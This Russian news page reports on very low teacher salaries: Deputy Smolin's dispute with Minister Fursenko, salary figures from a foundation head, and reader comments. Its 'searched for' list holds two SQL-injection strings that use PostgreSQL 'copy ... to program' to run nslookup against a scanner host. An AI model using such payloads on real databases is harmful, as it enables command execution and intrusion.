Последние новости
Новости образования /

Фурсенко был очень удивлен низкой зарплате учителей

Между депутатом Госдумы Олег Смолиным и министром образования и науки Андреем Фурсенко сравнительно недавно произошел спор о зарплатах учителей. Министр был очень возмущен, узнав, что педагоги получают мизерные копейки, и даже не поверил депутату.

«Недавно на пленарном заседании Государственной Думы у меня с министром образования и науки Андреем Фурсенко была дискуссия,— рассказывает Олег Смолин.— Я озвучил заработную плату моего общественного помощника, учителя из Муромцевского района. Она снижалась год от года и в конце концов достигла 6 тысяч рублей, причем этот человек — лауреат конкурса «Учитель года». Министр кричал, что такого быть не может»,— сообщил депутат омской газете «Ваш ОРЕОЛ». «После этого я переслал ему зарплатные квиточки работников одного сельского детского сада, за вычетом налогов сотрудники получали от трех тысяч восьмисот рублей до пяти с половиной тысяч»,— добавил Смолин.Если вдуматься, перед нами совершенно фантасмагорическая картина. О нищенском положении учителей министр узнает от парламентария, и оказывается просто поражен услышанным. Хотя, казалось бы, кто как не Фурсенко должен лучше всех знать о жизни педагогов? Но сюрреалистичность ситуации станет еще более явной, если вспомнить, что такая политика зарплат проводится на фоне бесконечных разговоров о модернизации, переходе на инновационные рельсы, внедрении нанотехнологий и тому подобных красивых лозунгов.

Откуда же возьмутся кадры на технологически рывок при таком отношении к учителям? Советские кадры, увы, не вечны, а кто придет им на смену? Неужели по примеру Петра I начнем приглашать иностранцев? Но за те копейки, что платят нашим специалистам, они ни за что не согласятся работать. Значит, придется им обеспечивать зарплату даже не по западному стандарту, а выше, ведь иначе какой им смысл уезжать из своих стран. Петр I так и делал, но в те времена у него просто не было иного выхода. Российскую научную школу тогда еще предстояло создать. Но сейчас же ситуация другая. Сейчас у нас есть все, что нужно: и школа, и вузы и наука. Кстати, деньги тоже есть. Новость о том, что мы проводим чемпионат мира по футболу, это только подтверждает. На футбол у нас найдутся миллиарды долларов, а вот учителям «не повезло».

Причем, и не скажешь, что власть не понимает всей серьезности момента. Дмитрий Медведев в своем Послании Федеральному собранию обратил внимание на вопросы школьного и дошкольного образования. И наверное, сами по себе тезисы, озвученные президентом, не вызовут ни у кого критики. Но в конечном итоге все определяется практикой. А что реально происходит в системе образования, очень хорошо видно по тому курьезному случаю, о котором сообщил депутат Смолин.

Об уровне зарплат учителей в нашей стране порталу КМ.RU рассказывает президент Всероссийского фонда образования Сергей Комков:

Заработная плата сегодняшних работников системы образования для многих представляется туманной сферой. Существует сложная тарифная сетка, 18 разрядов, есть зависимость от уровня образования, стажа работы, достижений. Каждый год для всех директоров школ и заведующих детскими садами начинается головная боль, потому что они всех своих работников должны «протарифицировать». В последние годы вмешалась еще одна деталь в исчисление заработной платы: мы перешли на нормативно-подушевой принцип финансирования.

Суть принципа такова: если в школе 1000 человек, то на учреждение выделяется одна сумма, если 100 человек – то в десять раз меньше. Это несправедливо по одной простой причине: независимо от количества учеников в школе, там должен быть полностью обеспечен процесс обучения и воспитания, а если учеников немного, то и не будет средств для приобретения учебного оборудования, учебных пособий, всего сопутствующего инвентаря. Это достаточно опасный принцип, потому что большая часть российских школ – малокомплектные. Часто в таких маленьких школах не хватает средств на элементарные вещи.

Средняя заработная плата учителя начальных классов в такой маленькой региональной сельской школе не превышает 3–7 тысяч рублей, учителя средних классов – 10–12 тысяч рублей. У директоров таких небольших школ зарплата не превышает 18–20 тысяч рублей. Исключением могут являться школы в таких крупных мегаполисах, как Москва, Санкт-Петербург, Новосибирск, Екатеринбург. Здесь средняя заработная плата учителя начальных классов составляет 15–20 тысяч рублей, у учителей средних классов может составлять 24–26 тысяч рублей. Аналогичная ситуация складывается и в дошкольных образовательных учреждениях, в детских садах.

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2812.1964.e9327.1.bxss.me
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2475.1964.84dec.1.bxss.me
  • testing
  • сегодняшняя зарплата учителя из чего складывается
  • екатер средняя зарплата учителей начальных классов
4 комментария
Benge / 2 октября 2012 / 18:07
Ни для кого не секрет, что у учителей очень низкая зарплата. А ведь учителя дают основу знаний нашим детям, внукам. Кроме того, педагоги еще и воспитывают вместе с нами наших детей. Попадаются и трудные подростки, с которыми учителю бывает сложно справиться и которые другим детям мешают усваивать материал урока. При такой низкой зарплате особенно тяжело прожить молодым специалистам, которые самостоятельную жизнь начинают с нуля. Перед ними стоит квартирный вопрос, рождение ребенка и пр. Я считаю, что зарплату учителям необходимо повысить.
5winter9 / 28 октября 2012 / 21:49
О низкой зарплате учителей знаю не по наслышке. Она действительно становится год от года меньше, стимулирующие надбавки - это миф, они не спасают положения. Удивляет в такой ситуации отношение общества, особенно СМИ к учителям. Единичные случаи приписывают всем. Давление на учителя оказывается и администрацией, и родителями, и учащимися...
таня / 23 января 2013 / 20:01
Зарплата учителям в новосибирске за декабрь еще не выдана....а вы хотите,чтобы учителя еще новациями занимались.грошевой зарплаты и то нет после нового года.
Алия Усмановна / 14 апреля 2013 / 23:39
Я учитель математики, стаж работы 33 года, образование высшее, категория высшая, работаю в Пензенской области. З/п 7899,30, с вычетами 6052,3 рубля. Стимулирующие в текущем учебном году нам не выплатили: в сентябре, январе, феврале, за март подкинули 5290, в апреле не обещают. Господин Фурсенко посоветуйте как нам жить?
имя


Популярые сообщения